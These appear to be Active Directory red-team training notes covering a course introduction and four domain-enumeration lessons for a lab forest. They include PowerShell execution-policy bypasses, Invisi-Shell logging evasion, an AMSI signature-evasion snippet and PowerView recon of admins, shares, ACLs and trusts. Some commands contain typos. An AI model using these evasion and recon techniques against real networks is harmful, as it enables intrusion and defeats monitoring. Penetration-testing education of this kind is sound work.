├── Course Introduction.md ├── Domain Enumeration - Part 1.md ├── Domain Enumeration - Part 2.md ├── Domain Enumeration - Part 3.md ├── Domain Enumeration - Part 4.md ├── Domain Enumeration - Part 5.md ├── Domain Persistence.md ├── Domain Privilege Escalation.md ├── Invoke-MimiEx.ps1 ├── Lateral Movement.md ├── Local Privilege Escalation.md ├── Methodology.md ├── README.md └── Trust Abuse.md /Course Introduction.md: -------------------------------------------------------------------------------- 1 | # **What we will cover** 2 | 3 | - [ ] **Introduction to Active Directory and Kerberos** 4 | - [ ] **Introduction to Powershell** 5 | - [ ] **Domain Enumeration (Attacks and Defense)** 6 | - [ ] **Trust and Privileges Mapping** 7 | - [ ] **Local Privilege Escalation** 8 | - [ ] **Credential Replay Attacks (Over-PassTheHash, Token Replay etc.)** 9 | - [ ] **Domain Privilege Escalation (Attacks and Defense)** 10 | - [ ] **Dumping System and Domain Secrets** 11 | - [ ] **Kerberos Attacks and Defense (Golden, silver tickets and more)** 12 | - [ ] **Abusing Cross Forest Trusts (Attacks and Defense)** 13 | - [ ] **Delegation Issues** 14 | - [ ] **Persistence Techniques** 15 | - [ ] **Abusing SQL Server Trusts in an AD Environment** 16 | - [ ] **Bypassing Defenses** 17 | 18 | # **Our End Goal** 19 | 20 | - [ ] **Basic Prior Knowledge of Active Directory is needed** 21 | - [ ] **Demonstrate how an attack can be executed and then have learning objective to practice what we have learnt** 22 | - [ ] **The lab focuses on real world red team operations using built-in tools and focusing on functionality abuse** 23 | - [ ] **No exploits and exploitation framework is needed** 24 | - [ ] **We start from a foothold box as a normal domain user to domain admins** 25 | 26 | 27 | # **Philosophy of This Course** 28 | 29 | - [ ] **We will emulate an adversary who has a foothold machine on the target domain** 30 | - [ ] **We will not use any exploit** 31 | - [ ] **We will try to abuse functionality and features which are rarely patched** 32 | - [ ] **We try to use built-in tools and avoid touching disk on any target and will not use exploit framework throughout the lessons** 33 | 34 | # **What is Active Directory** 35 | 36 | - [ ] A directory Service used to manage windows Network 37 | - [ ] Stores information about objects on the network and makes it easily accessible by available users and admins 38 | - [ ] Enables Centralized, secure management of an entire network across a building, a city or multiple locations throughout the world 39 | 40 | # **Active Directory Components** 41 | 42 | - [ ] Schema - Defines objects and their attributes 43 | - [ ] Query and index mechanism - Provides searching and publication of objects and their properties 44 | - [ ] Global catalog - Contains information about every object in the directory 45 | - [ ] Replication service - Distribute information across domain controllers 46 | 47 | 48 | 49 | ![](https://i.imgur.com/gurz65j.png) 50 | 51 | 52 | # **Active Directory Structure** 53 | 54 | - [ ] Forests, domains and Organization units are the basic building blocks of active directory structure 55 | 56 | ![](https://servergeeks.files.wordpress.com/2012/10/ad-1.jpg) 57 | 58 | 59 | # **What is Powershell?** 60 | 61 | 62 | - [ ] Provides access to almost everything in a windows platform and Active Directory environment 63 | - [ ] More useful for an attacker 64 | - [ ] Provides the capability of running powerful scripts completely from memory making it ideal for foothold shells/boxes 65 | - [ ] Easy to learn and really powerful 66 | - [ ] Based on **.NET** framework and is tightly integrated with windows 67 | 68 | 69 | # **Powershell Help System** 70 | 71 | 72 | - Show help message and exit 73 | 74 | ```powershell 75 | $ Get-Help 76 | $ Help 77 | $ -? 78 | ``` 79 | 80 | - supports wildcard. 81 | - Comes with various options and filters. 82 | - Get help for conceptual topics -: 83 | 84 | ```powershell 85 | $ Get-Help About_ 86 | ``` 87 | 88 | 89 | - List everything about the help topics 90 | 91 | ```powershell 92 | $ Get-Help * 93 | ``` 94 | 95 | - List everything that contains the word, **process** 96 | 97 | ```powershell 98 | $ Get-Help process 99 | ``` 100 | 101 | ![](https://i.imgur.com/Xbqgted.png) 102 | 103 | 104 | - Update help system -: 105 | 106 | ```powershell 107 | $ Update-Help 108 | ``` 109 | 110 | - List full help about a topic (Get-Item cmdlet in this case) 111 | 112 | ```powershell 113 | $ Get-Help Get-Item -Full 114 | ``` 115 | 116 | - List examples of how to run a cmdlet (Get-Item cmdlet in this case) 117 | 118 | ```powershell 119 | $ Get-Help Get-Item -Examples 120 | ``` 121 | 122 | 123 | # **What are Powershell Cmdlets** 124 | 125 | 126 | - they are used to perform an action and a **.NET** object is returned as the output. 127 | - They accept parameters for different operations 128 | - They have aliases 129 | - They are NOT executables and can be written with few lines of scripts 130 | 131 | - To list all cmdlets do -: 132 | 133 | ```powershell 134 | $ Get-Command -CommandType cmdlet 135 | ``` 136 | 137 | 138 | - There are many cmdlets from an attacker's perspective. for example `Get-process` lists processes running on a system. 139 | 140 | 141 | ![](https://i.imgur.com/r08A5q7.png) 142 | 143 | **Reference -:** [https://learn.microsoft.com/en-us/powershell/module/microsoft.powershell.management/get-process?view=powershell-7.3](https://learn.microsoft.com/en-us/powershell/module/microsoft.powershell.management/get-process?view=powershell-7.3) 144 | 145 | 146 | # **Powershell Scripts** 147 | 148 | 149 | - Uses cmdlets, native commands, functions, .NET, DLLs, Windows API and much more in a single **program** 150 | - Powershell scripts are really powerful and could do much stuff in less lines 151 | - Easy syntax 152 | 153 | ## **ISE** 154 | 155 | - It is a GUI editor/scripting environment 156 | - Tab completion, context-sensitive help, syntax highlighting, selective execution, in-line help are some useful features 157 | - Comes with a handy console pane to run commands from the ISE 158 | 159 | ## **Execution Policy** 160 | 161 | By default running powershell scripts on a box after foothold might be disabled on a machine due to **Execution Policy** 162 | 163 | - It is not a security measure, it is present to prevent user from accidentally executing scripts. 164 | - Several ways to bypass 165 | 166 | ```powershell 167 | $ powershell -Executionpolicy bypass 168 | $ powershell -c 169 | $ Powershell -encodedcommand 170 | $ $env:PSExecutionPolicyPreference="bypass" 171 | ``` 172 | 173 | 174 | **Reference -:** [https://www.netspi.com/blog/technical/network-penetration-testing/15-ways-to-bypass-the-powershell-execution-policy/](https://www.netspi.com/blog/technical/network-penetration-testing/15-ways-to-bypass-the-powershell-execution-policy/) 175 | 176 | 177 | # **Powershell Modules** 178 | 179 | - **Powershell** also support modules 180 | - A module can me imported with -: 181 | 182 | 183 | ```powershell 184 | $ Import-Module 185 | ``` 186 | 187 | - All the commands in a module can be listed with -: 188 | 189 | ```powershell 190 | $ Get-Command -Module 191 | ``` 192 | 193 | 194 | # **Powershell Script Execution** 195 | 196 | 197 | ![](https://i.imgur.com/mnJMOA1.png) 198 | 199 | # **Powershell and AD** 200 | 201 | Powershell and Active Directory Integration 202 | 203 | - [ADSI] 204 | - .NET Classes 205 | `System.DirectoryServices.ActiveDirectory` 206 | - Native Executable 207 | - Powershell (.NET Classes and WMI) 208 | 209 | 210 | # **Methodology - Assume Breach** 211 | 212 | - Insider attack simulation is an important part of the assume breach execution cycle. 213 | - The assume breach methodology will will be used on an AD environment and use internal access available with an adversary to perform further attacks 214 | 215 | 216 | ![](https://i.imgur.com/YBUBDUg.png) 217 | 218 | 219 | 220 | # **Insider Attack Simulation** 221 | 222 | - **Recon** - Gather IP address, hostname etc 223 | - Domain Enumeration - Enumerate domains for shares, usernames etc 224 | - **Local Privilege Escalation** - Moving from a lower level user to a higher level user 225 | - **Admin Reconnaissance** - Once we have enough rights and knowledge we start to dig deep 226 | - **Lateral Movement** - We start to check if we have access to any other machines with trusted privileges 227 | - **Domain Admin privileges** 228 | - **Cross Trust Attacks** - We escalate privileges from **domain** admin to **enterprise** admin then to different trusted forest 229 | - **Persist and Exfiltrate** - We try as much as possible to maintain access while extracting data 230 | 231 | ![](https://i.imgur.com/lu6j7Eh.png) 232 | 233 | # **The lab Environment** 234 | 235 | 236 | ![](https://i.imgur.com/WTDzOE2.png) 237 | 238 | 239 | -------------------------------------------------------------------------------- /Domain Enumeration - Part 1.md: -------------------------------------------------------------------------------- 1 | # **What is Domain Enumeration?** 2 | 3 | - Once we have a foothold on target machine 4 | - We will try to map out various entities, trusts, ACL's, relationships and privileges for the target domain 5 | - The enumeration can be done by using Native executables and **.NET** classes in powershell 6 | 7 | # **Enumerating Domain** 8 | 9 | - To check DC, Parent, forest etc -: 10 | 11 | ```powershell 12 | $ $ADClass = [System.DirectoryServices.AtciveDirectory.Domain] 13 | $ $ADClass::GetCurrentomain() 14 | ``` 15 | 16 | To check current user privilege use -: 17 | 18 | ```powershell 19 | $ whoami /priv 20 | ``` 21 | 22 | - To speed up things we can use Powerview -: 23 | 24 | https://github.com/ZeroDayLab/PowerSploit/blob/master/Recon/PowerView.ps1 25 | 26 | 27 | - The active directory powershell module comes in handy as it offers less detection by AV 28 | 29 | 30 | 31 | https://4sysops.com/wiki/how-to-install-the-powershell-active-directory-module/ 32 | 33 | 34 | 35 | - To use ActiveDirectory module without installing **Remote Server Administration Tools** (RSAT), we can use `Import-Module` for the valid ActiveDirectory module DLL -: 36 | 37 | 38 | https://github.com/samratashok/ADModule 39 | 40 | 41 | 42 | ## **Importing Modules to powershell** 43 | 44 | 45 | ### **Powerview module** 46 | 47 | First of all download the powerview `.ps1` file from the link above 48 | 49 | - change directory to where the module is located and run the powerview module 50 | 51 | ```powershell 52 | $ cd C:\AD\Tools 53 | $ ..\Powerview.ps1 54 | ``` 55 | 56 | 57 | **_Example :_** 58 | 59 | ![](https://i.imgur.com/64RjZRZ.png) 60 | 61 | 62 | ### **Active Directory Powershell module** 63 | 64 | 65 | Download both files (`.dll` and `.psd1`) from senpai **samratashok** github handle from the link above 66 | 67 | - Import `Microsoft.ActiveDirectory.Management.dll` 68 | 69 | ```powershell 70 | $ cd C:\AD\Tools\ADmodule-master 71 | $ Import-Module .\Microsoft.ActiveDirectory.Management.dll 72 | ``` 73 | 74 | - Import `ActiveDirectory.psd1` 75 | 76 | ```powershell 77 | $ Import-Module .\ActiveDirectory\ActiveDirectory.psd1 78 | ``` 79 | 80 | 81 | **_Example :_** 82 | 83 | ![](https://i.imgur.com/ugWzM3j.png) 84 | 85 | 86 | **Sometimes we might need to bypass Antimalware Scan Interface (AMSI) before we can upload this modules, we look on how to do that (**On**) -:** 87 | 88 | 89 | # **Bypassing PowerShell Security** 90 | 91 | 92 | • We will use Invisi-Shell (https://github.com/OmerYa/Invisi-Shell) for 93 | bypassing the security controls in PowerShell. 94 | 95 | • The tool hooks the .NET assemblies 96 | (System.Management.Automation.dll and System.Core.dll) to bypass 97 | logging 98 | 99 | • It uses a CLR Profiler API to perform the hook. 100 | 101 | • "A common language runtime (CLR) profiler is a dynamic link library 102 | (DLL) that consists of functions that receive messages from, and send 103 | messages to, the CLR by using the profiling API. The profiler DLL is 104 | loaded by the CLR at run time." 105 | 106 | 107 | ## **How to use** 108 | 109 | 110 | Using Invisi-Shell 111 | 112 | 113 | • With admin privileges run: 114 | 115 | ```powershell 116 | $ RunWithPathAsAdmin.bat 117 | ``` 118 | 119 | 120 | 121 | • With non-admin privileges: 122 | 123 | 124 | ```powershell 125 | $ RunWithRegistryNonAdmin.bat 126 | 127 | # Always use this one cos' it a bit silent 128 | # Regardless of admin or non-admin privileges 129 | ``` 130 | 131 | 132 | • Type exit from the new `PowerShell` session to complete the clean-up. 133 | 134 | 135 | 136 | # **Bypassing AV Signatures for PowerShell** 137 | 138 | 139 | - We can always load scripts in memory and avoid detection using AMSI bypass 140 | - How do we bypass signature based detection of on-disk PowerShell scripts by Windows Defender? 141 | - We can use the AMSITrigger (https://github.com/RythmStick/AMSITrigger) tool to identify the exact part of a script that is detected. 142 | - We can use DefenderCheck (https://github.com/t3hbb/DefenderCheck) to identify code and strings from a binary / file that Windows Defender may flag. 143 | - Simply provide path to the script file to scan it: 144 | 145 | ```powershell 146 | $ AmsiTrigger_x64.exe -i C:\AD\Tools\Invoke-PowerShellTcp_Detected.ps1 147 | $ DefenderCheck.exe PowerUp.ps1 148 | ``` 149 | 150 | - For full obfuscation of PowerShell scripts, see Invoke-Obfuscation (https://github.com/danielbohannon/Invoke-Obfuscation). That is used for obfuscating the AMSI bypass in the course! 151 | 152 | ## **Steps to avoid signature based detection are pretty simple:** 153 | 154 | 1. Scan using AMSITrigger 155 | 2. Modify the detected code snippet 156 | 3. Rescan using AMSITrigger 157 | 4. Repeat the steps 2 & 3 till we get a result as **“AMSI_RESULT_NOT_DETECTED”** or 158 | **“Blank”**. 159 | 160 | 161 | **_Example -:_** 162 | 163 | 164 | • Scan using `AMSITrigger` 165 | 166 | 167 | ![](https://i.imgur.com/h5qjJAE.png) 168 | 169 | 170 | • Reverse the **"System.AppDomain"** string on line number 59 171 | 172 | 173 | ```powershell 174 | $String = 'niamoDppA.metsyS’ 175 | $classrev = ([regex]::Matches($String,'.','RightToLeft') | ForEach 176 | {$_.value}) -join ‘’ 177 | $AppDomain = 178 | [Reflection.Assembly].Assembly.GetType("$classrev").GetProperty('Cur 179 | rentDomain').GetValue($null, @()) 180 | ``` 181 | 182 | 183 | • Check again with `AMSITrigger` 184 | 185 | 186 | ![](https://i.imgur.com/sC7X1g7.png) 187 | 188 | 189 | 190 | > Make sure to check PDF for more examples 191 | 192 | 193 | 194 | ## **Enumerating Domain with Powerview and Active Directory Module** 195 | 196 | **_Note :_** If one doesn't work then the other will, you know the difference between both as stated earlier 197 | 198 | - Get Current Domain 199 | 200 | ```powershell 201 | $ Get-Domain # Powerview 202 | $ Get-ADDomain # ActiveDirectory Module 203 | ``` 204 | 205 | - Get object of another domain 206 | 207 | ```Powershell 208 | $ Get-Domain -Domain moneycorp.local # Powerview 209 | $ Get-ADDomain -Identity moneycorp.local # AD Module 210 | ``` 211 | 212 | 213 | - Get domain SID for the current domain 214 | 215 | ```powershell 216 | $ Get-DomainSID # powerview 217 | $ (Get-ADDomain).DomainSID # AD module 218 | ``` 219 | 220 | - Get domain policy for the current domain 221 | 222 | ```powershell 223 | $ Get-DomainPolicyData # Powerview 224 | $ (Get-DomainPolicyData).systemaccess # Powerview 225 | ``` 226 | 227 | 228 | **_Example :_** 229 | 230 | 231 | ![](https://i.imgur.com/IXElkMe.png) 232 | 233 | 234 | - Get domain policy for another domain 235 | 236 | ```powershell 237 | $ (Get-DomainPolicy -domain moneycorp.local).systemaccess # powerview 238 | ``` 239 | 240 | 241 | - Get kerberos policy 242 | 243 | ```powershell 244 | $ (Get-DomainPolicy)."Kerberos Policy" # powerview 245 | ``` 246 | 247 | 248 | > This is useful if we want to carry out an attack like **Golden tickets** as it makes sense to enumerate the **kerberos** policy first 249 | 250 | 251 | - Get domain controllers for the current domain 252 | 253 | ```powershell 254 | $ Get-DomainController # Powerview 255 | $ Get-ADDomainController # AD module 256 | ``` 257 | 258 | - Get domain controllers for another domain 259 | 260 | ```powershell 261 | $ Get-DomainController -Domain moneycorp.local # powerview 262 | $ Get-ADDomainController -DomainName moneycorp.local -Discover # AD module 263 | ``` 264 | 265 | > Once we have interesting information/details about the domain controller, we can start going after the users 266 | 267 | 268 | - Get a list of users in the current domain 269 | 270 | ```powershell 271 | # Powerview 272 | $ Get-DomainUser 273 | $ Get-DomainUser -Identity student1 274 | 275 | # Active Directory Module 276 | $ Get-ADUser -Filter * -Properties * 277 | $ Get-ADUser -Identity student1 -Properties * 278 | ``` 279 | 280 | We can also sort out properties by Piping (|) what we want to the `select` command e.g -: 281 | 282 | 283 | ```powershell 284 | # Powerview 285 | # output only the "cn" property of each user data 286 | $ Get-DomainUser | select cn 287 | 288 | # AD modules 289 | # output only the "Name" property from each user data 290 | Get-ADUser -Filter * -Properties * | select Name 291 | ``` 292 | 293 | 294 | This are what we call properties -: 295 | 296 | 297 | 298 | ![](https://i.imgur.com/ycv4kYe.png) 299 | 300 | 301 | - Get list of all properties for users in the current domain 302 | 303 | ```powershell 304 | # Powerview 305 | $ Get-DomainUser -Identity student1 -Properties * 306 | $ Get-DomainUser -Properties samaccountname,logonCount 307 | 308 | # AD Modules 309 | $ Get-ADUser -Filter * -Properties * | select -First 1 | Get-Member -MemberType *Property | select Name 310 | 311 | $ Get-ADUser -Filter * -Properties * | select name,@{expression={[datetime]::fromFileTime($_.pwdlastset)}} 312 | ``` 313 | 314 | 315 | Enumerating **properties** is a very important phase when performing Active Directory attacks, here are few properties you should consider using in `powerview` -: 316 | 317 | ```powershell 318 | # powerview 319 | $ Get-DomainUser -Properties pwdlastset 320 | $ Get-DomainUser -Properties badpwdcount 321 | $ Get-DomainUser -Properties logoncount 322 | ``` 323 | 324 | **pwdlastset** -: The `pwdlastset` property stores the value of the date and time when the user's password was last changed. The older the time of change, The higher chance the account is a decoy, Take Note! 325 | 326 | 327 | ![](https://i.imgur.com/apx9rn0.png) 328 | 329 | 330 | 331 | **badpwdcount** -: The badPwdCount property specifies the number of times the user tried to log on to the account using an incorrect password. Any user with 0 count or low is definitely a decoy because they don't have incorrect logon attempts. 332 | 333 | 334 | ![](https://i.imgur.com/0qyltCP.png) 335 | 336 | **logoncount** -: This attribute specifies the number of times that the account has successfully logged on. A value of 0 indicates that the value is unknown 337 | 338 | ![](https://i.imgur.com/Txuo0A4.png) 339 | 340 | 341 | - Search for a particular string in a user's attributes : 342 | 343 | ```powershell 344 | # Powerview 345 | $ Get-DomainUser -LDAPFilter "Description=*built*" | Select name,Description 346 | 347 | # AD Module 348 | $ Get-ADUser -Filter 'Description -like "*built*"' -Properties Description | select name,Description 349 | ``` 350 | 351 | > **Note -:** We can not only use the keyword **"built"** when using the option `-SearchTerm`, we can search for keywords like **"Password"**, **"Username"** , **"Secrets"** etc. 352 | 353 | -------------------------------------------------------------------------------- /Domain Enumeration - Part 2.md: -------------------------------------------------------------------------------- 1 | # **Domain Enumeration Cont'd** 2 | 3 | **Make sure to import/download both powerview and AD Module first from the links shown in Domain Enumeration - Part 1** 4 | 5 | 6 | 7 | - Get a list of Computers in the Current domain 8 | 9 | ```powershell 10 | # Powerview 11 | $ Get-DomainComputer | select Name 12 | $ Get-DomainComputer -OperatingSystem "*Server 2016*" 13 | $ Get-DomainComputer -Ping 14 | $ Get-DomainComputer -FullData 15 | 16 | # AD Module 17 | $ Get-ADComputer -Filter * | select Name 18 | $ Get-ADComputer -Filter 'OperatingSystem -like "*Server 2016*"' -Properties OperatingSystem | select Name,OperatingSystem 19 | $ Get-ADComputer -Filter * -Properties DNSHostName | %(Test-Connection -Count 1 -ComputerName $_.DNSHostName) 20 | $ Get-ADComputer -Filter * -Properties * 21 | ``` 22 | 23 | **_Example_ :** 24 | 25 | ![](https://i.imgur.com/vmBif3X.png) 26 | 27 | - Get all the groups in the current domain 28 | 29 | ```powershell 30 | # powerview 31 | $ Get-DomainGroup # provides list of all domain groups 32 | $ Get-DomainGroup -Domain 33 | $ Get-DomainGroup -FullData # list all group properties in a domain 34 | 35 | # AD Module 36 | $ Get-ADGroup -Filter * | select Name 37 | $ Get-ADGroup -Filter * -Properties * 38 | ``` 39 | 40 | 41 | - Get all groups containing the word "admin" in group name 42 | 43 | ```powershell 44 | # powerview 45 | $ Get-DomainGroup *admin* 46 | 47 | # AD Module 48 | $ Get-ADGroup -Filter 'Name -like "*admin*"' | select Name 49 | ``` 50 | 51 | - Get all the members of the Domain Admins and Enterprise Admins group 52 | 53 | ```powershell 54 | # powerview 55 | $ Get-DomainGroupMember -Identity "Domain Admins" -Recurse # Domain admins 56 | $ Get-DomainGroupMember -Identity "Enterprise Admins" -Recurse # Enterprise admins 57 | 58 | #test the below command also 59 | # Get-DomainGroupMember -Identity "Domain Admins" -Properties * | select DistinguishedName,GroupCategory,GroupScope,Name,Members 60 | 61 | # AD modules 62 | $ Get-ADGroupMember -Identity "Domain Admins" -Recursive # Domain admins 63 | $ Get-ADGroupMember -Identity "Enterprise Admins" -Recursive # Enterprise admins 64 | ``` 65 | 66 | **_Example :_** 67 | 68 | 69 | ![](https://i.imgur.com/nYGNRo8.png) 70 | 71 | 72 | > **Note :** The `IsGroup` property tells us that this two domain admins do not belong to any group, they stand alone as a normal user, Also if does not matter what the `MemberName` property is, if the `MemberSID` **RID** is available (ask google for more info!!), the **RID** is an identifier telling us who this person is, It might be an Administrator account having a different/changed member-name but if you check the **RID** and it is "500" then it is an Administrator account 73 | 74 | 75 | - Get the group membership for a user : 76 | 77 | Run whoami first to check for the current username 78 | 79 | ```powershell 80 | $ whoami 81 | marvel\fcastle 82 | ``` 83 | 84 | Now get the group membership with the username 85 | 86 | ```powershell 87 | # powerview 88 | $ Get-DomainGroup -UserName "fcastle" 89 | 90 | # AD Module 91 | $ Get-ADPrincipalGroupMembership -Identity fcastle 92 | ``` 93 | 94 | 95 | > **Note :** If you see an **RID** then it is a builtin group, if no **RID** then it isn't a built in group 96 | 97 | 98 | ![](https://i.imgur.com/5k973U5.png) 99 | 100 | 101 | 102 | - List all the local groups on a machine (needs administrator privs on non-dc machines) 103 | 104 | ```powershell 105 | # powerview 106 | $ Get-NetLocalGroup -ComputerName dcorp-dc.dollarcorp.moneycorp.local -ListGroups 107 | ``` 108 | 109 | 110 | - Get members of all the local groups on a machine (needs administrator privs on non-dc machines) 111 | 112 | ```powershell 113 | # powerview 114 | $ Get-NetLocalGroup -ComputerName dcorp-dc.dollarcorp.moneycorp.local -Recurse 115 | ``` 116 | 117 | 118 | - Get members of the local group "Administrators" on a machine (needs administrator privs on non-dc machines) : 119 | 120 | ```powershell 121 | # Powerview 122 | Get-NetLocalGroupMember -ComputerName dcorp-dc -GroupName Administrators 123 | ``` 124 | 125 | 126 | 127 | - Get actively logged users on a computer (needs local admin rights on the target) 128 | 129 | ```powershell 130 | # powerview 131 | $ Get-NetLoggedon -ComputerName dcorp-adminsrv 132 | ``` 133 | 134 | 135 | - Get locally logged users on a computer (needs remote registry on the target - started be default on server OS) 136 | 137 | ```powershell 138 | # powerview 139 | $ Get-LoggedonLocal -ComputerName dcorp-dc.dollarcorp.moneycorp.local 140 | ``` 141 | 142 | 143 | - Get the last logged user on a computer (needs administrative rights and remote registry on the target) 144 | 145 | ```powershell 146 | # powerview 147 | $ Get-LastLoggedon -ComputerName dcorp-adminsrv 148 | ``` 149 | 150 | - Find shares on hosts in current domain 151 | 152 | ```powershell 153 | # powerview 154 | $ Invoke-ShareFinder -Verbose # print all shares 155 | $ Invoke-ShareFinder -Verbose -ExcludeStandard -ExcludePrint -ExcludeIPC # remove default shares from output 156 | 157 | # there are high chances we can access any of the shares given as output 158 | ``` 159 | 160 | 161 | - Find sensitive files on computers in the domain 162 | 163 | ```powershell 164 | # powerview 165 | $ Invoke-FileFinder -Verbose 166 | ``` 167 | 168 | 169 | - Get all fileservers of the domain 170 | 171 | ```powershell 172 | # powerview 173 | $ Get-NetFileServer -Verbose # looks for high valued target 174 | ``` 175 | 176 | 177 | 178 | # **Learning Objective 1** 179 | 180 | - [ ] Enumerate following for the dollarcorp domain : 181 | - - Users 182 | - - Computers 183 | - - Domain Administrators 184 | - - Enterprise Administrators 185 | - - Shares 186 | 187 | 188 | ### **Solution** 189 | 190 | **_Coming Soon_** 191 | 192 | -------------------------------------------------------------------------------- /Domain Enumeration - Part 3.md: -------------------------------------------------------------------------------- 1 | 2 | # **Domain Enumeration Cont'd - GPO # Powerview** 3 | 4 | ## **What is Group Policy ?** 5 | 6 | - Group Policy Provides the ability to manage configuration and changes easily and centrally in AD. 7 | - Allows configuration of -: 8 | - Security settings 9 | - Registry-based policy settings 10 | - GPO preferences like startup/shutdown/log-on/logoff scripts settings 11 | - Software installation 12 | - GPO can be abused for various attacks like privilege escalation, backdoors, persistence etc. 13 | 14 | **Using `powerview` we can actually get some Interesting information from the GPO** 15 | 16 | - Get list of GPO in current domain 17 | 18 | ```powershell 19 | $ Get-DomainGPO # get list of all group policy object 20 | $ Get-DomainGPO -ComputerIdentity dcorp-student1.dollarcorp.moneycorp.local 21 | ``` 22 | 23 | We can also filter with -: 24 | 25 | ```powershell 26 | $ Get-DomainGPO | select displayname 27 | ``` 28 | 29 | > **Note :** The **Default Domain Policy** and **Default Domain Controllers Policy** are default GPO, so we should really focus on the ones that comes next. 30 | 31 | 32 | - Get GPO(s) which use restricted Groups of `groups.xml` for interesting users 33 | 34 | ```powershell 35 | $ Get-DomainGPOLocalGroup 36 | ``` 37 | 38 | - Get users which are in a local group of a machine using GPO 39 | 40 | ```powershell 41 | $ Find-DomainGPOComputerLocalGroupMapping -ComputerIdentity dcorp-student505.dollarcorp.moneycorp.local 42 | ``` 43 | 44 | - Get machines where the given user is member of a specific group 45 | 46 | ```powershell 47 | $ Find-DomainGPOUserLocalGroupMapping -Identity student1 -Verbose 48 | ``` 49 | 50 | 51 | # **Domain Enumeration - Organizational Units (OU)** 52 | 53 | 54 | 55 | 56 | - Get OUs in a domain 57 | 58 | ```powershell 59 | $ Get-DomainOU 60 | ``` 61 | 62 | - Get GPO applied on an OU. Read GPOname from gplink attribute from Get-NetOU 63 | 64 | First of all run 65 | 66 | ```powershell 67 | $ Get-DomainOU 68 | ``` 69 | 70 | Now copy the GPO of the OU you want to extract machines from 71 | 72 | ![](https://i.imgur.com/DGySe2D.png) 73 | 74 | Then run 75 | 76 | ```powershell 77 | $ Get-DomainGPO -Identity "{AB306569-220D-43FF-BO3B-83E8F4EF8081}" 78 | ``` 79 | 80 | 81 | # **Learning Objective 2** 82 | 83 | - [ ] Enumerate following for the dollarcorp domain 84 | - List all the OUs 85 | - List all the computers in the StudentMachines OU. 86 | - List all the GPOs 87 | - Enumerate GPO applied on the StudentMachines OU 88 | 89 | 90 | ## **Solution** 91 | 92 | 93 | **_Coming Soon_** 94 | 95 | 96 | 97 | 98 | # **Domain Enumeration Cont'd - ACL** 99 | 100 | 101 | ## **What is an Access Control Model (ACL) ?** 102 | 103 | 104 | - [ ] Enables control on the ability of a process to access objects and other resources in active directory based on : 105 | - Access Tokens (security context of a process - identity and privileges of user) 106 | - Security Descriptors (SID of the owner, Discretionary ACL (DACL) and System ACL (SACL)) 107 | 108 | 109 | ## **Enumerating ACL** 110 | 111 | - Get the ACLs associated with the specified object 112 | 113 | ```powershell 114 | # powerview 115 | $ Get-DomainObjectAcl -SamAccountName student1 -ResolveGUIDs 116 | ``` 117 | 118 | 119 | **_Example :_** 120 | 121 | 122 | ![](https://i.imgur.com/sNgi5yP.png) 123 | 124 | > Note that there are 3 major properties we should look out for. The `ObjectDN` which signifies name of target machine, in this case `CN=student1`. Then the `IdentityReference` that states which users have permissions followed by the `ActiveDirectoryRights` that states the permissions that **IdentityReference** users have. 125 | 126 | 127 | - Get the ACLs associated with the specified prefix to be used for search 128 | 129 | ```powershell 130 | # powerview 131 | $ Get-DomainObjectAcl -SearchBase "LDAP://CN=DomainAdmins,CN=Users,DC=dollarcorp,DC=moneycorp,DC=local" -ResolveGUIDs -Verbose 132 | ``` 133 | 134 | - We can also enumerate ACLs using **ActiveDirectory** module but without resolving GUIDs 135 | 136 | ```powershell 137 | # AD Module 138 | $ (Get-Acl "AD:\CN=Administrator, CN=Users, DC=dollarcorp, DC=moneycorp,DC=local").Access 139 | ``` 140 | 141 | - Get the ACLs associated with the specified LDAP path to be used for search 142 | 143 | ```powershell 144 | # powerview 145 | $ Get-DomainObjectAcl -ADSpath "LDAP://CN=DomainAdmins,CN=Users,DC=dollarcorp,DC=moneycorp,DC=local" -ResolveGUIDs -Verbose 146 | ``` 147 | 148 | - Search for interesting ACEs 149 | 150 | ```powershell 151 | # powerview 152 | $ Find-InterestingDomainAcl -ResolveGUIDs 153 | ``` 154 | 155 | - Get the ACLs associated with the specified path 156 | 157 | ```powershell 158 | # powerview 159 | $ Get-PathAcl -Path "\\dc.mydomain.local\sysvol" 160 | ``` 161 | 162 | # **Learning Objective 3** 163 | 164 | - [ ] Enumerate following for the dollarcorp domain: 165 | - ACL for the Users group 166 | - ACL for the Domain Admins group 167 | - All modify rights/permissions for the student 168 | 169 | 170 | ## **Solution** 171 | 172 | 173 | **_Coming Soon_** 174 | 175 | 176 | -------------------------------------------------------------------------------- /Domain Enumeration - Part 4.md: -------------------------------------------------------------------------------- 1 | # **Domain Enumeration Cont'd - Trusts** 2 | 3 | ## **What is Trusts** 4 | 5 | - Trust is a relationship between two domains or forests which allows users of one domain or forest to access resources in the other domain or forest. 6 | - Trust can be automatic (parent-child, same forest etc.) or established (forest, external). 7 | - Trusted Domain Objects (TDOs) represent the trust relationships in a domain 8 | 9 | ## **Trust Direction** 10 | 11 | **_One-Way Trust -:_** 12 | 13 | ![](https://i.imgur.com/rty5NIl.png) 14 | 15 | **_Two-Way Trust -:_** 16 | 17 | ![](https://i.imgur.com/XJ1nq9T.png) 18 | 19 | 20 | **For More Information On Trusts, View Learning Material** 21 | 22 | - Get a list of all domain trusts for the current domain 23 | 24 | ```powershell 25 | # Powerview 26 | $ Get-DomainTrust 27 | $ Get-DomainTrust -Domain us.dollarcorp.moneycorp.local 28 | 29 | # AD Module 30 | $ Get-ADTrust 31 | $ Get-ADTrust -Identity us.dollarcorp.moneycorp.local 32 | ``` 33 | 34 | 35 | - Get details about the current forest 36 | 37 | ```powershell 38 | # powerview 39 | $ Get-Forest 40 | $ Get-Forest -Forest eurocorp.local 41 | 42 | # AD Module 43 | $ Get-ADForest 44 | $ Get-ADForest -Identity eurocorp.local 45 | ``` 46 | 47 | 48 | - Get all domains in the current forest 49 | 50 | ```powershell 51 | # powerview 52 | $ Get-ForestDomain 53 | $ Get-ForestDomain -Forest eurocorp.local 54 | 55 | # AD Module 56 | $ (Get-ADForest).Domains 57 | ``` 58 | 59 | - Get all global catalogs for the current forest 60 | 61 | ```powershell 62 | # powerview 63 | $ Get-ForestGlobalCatalog 64 | $ Get-ForestGlobalCatalog -Forest eurocorp.local 65 | ``` 66 | 67 | - Map trusts of a forest(no Forest trusts in the lab) 68 | 69 | ```powershell 70 | # powerview 71 | $ Get-ForestTrust 72 | $ Get-ForestTrust -Forest eurocorp.local 73 | ``` 74 | 75 | 76 | # **Learning Objective 4** 77 | 78 | - Enumerate all domains in the moneycorp.local forest. 79 | - Map the trusts of the dollarcorp.moneycorp.local domain. 80 | - Map external trust in the moneycorp.local forest. 81 | - Identify external trusts of dollarcorp domain. Can you enumerate trusts for a trusting forest ? 82 